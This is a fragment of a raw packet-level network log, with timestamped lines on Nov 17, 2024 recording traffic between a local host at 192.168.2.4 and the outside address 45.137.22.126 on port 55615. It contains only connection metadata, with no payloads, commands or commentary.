                                                                                                                                            Nov 17, 2024 03:07:14.189593077 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.189614058 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189625025 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189683914 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.189712048 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189724922 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189739943 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189762115 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189781904 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.189805984 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.189831018 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189846039 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189867973 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189898968 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.189909935 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.189924955 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.189964056 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.190038919 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.190051079 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.190073967 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.190085888 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.190124989 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.190129995 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.190176964 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.190685987 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.190737009 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191170931 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191358089 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191663027 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191685915 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191719055 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191730976 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191742897 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191767931 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191788912 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191807032 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191817999 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191896915 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191900015 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191943884 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191947937 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.191960096 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191987991 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.191992044 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192053080 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192059040 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192074060 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192127943 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192179918 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192194939 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192240000 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192251921 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192291021 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192292929 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192343950 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192382097 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192403078 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192435980 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192470074 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192517996 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192569971 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192580938 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192617893 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192661047 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192675114 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192712069 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192750931 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192785978 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192810059 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192842960 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192878008 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.192897081 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.192997932 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193010092 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193057060 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193068981 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193090916 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193104029 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193114996 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193120003 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193171978 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193201065 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193212986 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193253040 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193257093 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193276882 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193289995 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193324089 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193340063 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193368912 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193383932 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193398952 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193423033 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193449974 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193471909 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193483114 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193535089 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193537951 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193584919 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193614006 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193625927 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193641901 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193662882 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193702936 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193746090 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193757057 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193789959 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193800926 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193802118 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193837881 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193860054 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193865061 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193876982 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193945885 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.193949938 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193962097 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193975925 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.193999052 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194005013 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194031000 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194053888 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194060087 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194083929 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194118023 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194139957 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194140911 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194152117 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194205999 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194233894 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194247007 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194299936 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194330931 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194344044 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194376945 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194391012 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194400072 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194422007 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194452047 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194485903 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194499969 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194510937 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194540024 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194566965 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194585085 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194591045 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194643021 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194653034 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194700956 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194708109 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194744110 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194755077 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194756985 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194827080 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194835901 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194859028 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194916010 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.194960117 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.194972038 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195024967 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195075989 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195154905 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195157051 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195167065 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195190907 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195202112 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195228100 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195269108 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195272923 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195283890 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195332050 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195343018 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195354939 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195379972 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195419073 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195427895 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195440054 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195461035 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195472956 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195475101 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195496082 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195518017 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195554018 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195580959 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195595026 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195641994 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195658922 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195671082 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195724964 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195749044 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195804119 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195827007 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195836067 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195847988 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195847034 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195900917 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.195909977 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.195935011 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196001053 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196012020 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196023941 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196050882 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196062088 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196074963 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196115971 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196125984 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196141005 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196187019 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196194887 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196207047 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196248055 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196268082 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196274996 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196307898 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196338892 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196365118 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196377039 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196432114 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196454048 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196468115 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196494102 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196522951 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196536064 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196563959 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196609974 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196654081 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196666002 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196687937 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196698904 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196707964 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196728945 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196757078 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196816921 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196830034 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196882963 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196887970 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196899891 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196907043 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196928024 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196964979 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.196976900 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.196990013 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197025061 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197041988 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197046995 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197056055 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197110891 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197113037 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197153091 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197177887 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197207928 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197247982 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197278976 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197299004 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197336912 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197341919 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197354078 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197390079 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197424889 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197484016 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197495937 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197551966 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197561026 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197573900 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197612047 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197623968 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197637081 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197679043 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197698116 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197704077 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197726965 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197767019 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197829962 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197841883 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197885036 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197887897 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197896957 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197941065 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.197962046 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.197990894 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198043108 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198054075 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198065042 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198122025 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198122978 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198164940 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198175907 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198216915 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198230028 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198240995 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198261023 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198287010 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198303938 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198314905 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198347092 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198348045 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198393106 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198406935 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198445082 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198489904 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198502064 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198554993 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198568106 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198602915 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:14.198610067 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198649883 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.198668957 CET4973855615192.168.2.445.137.22.126
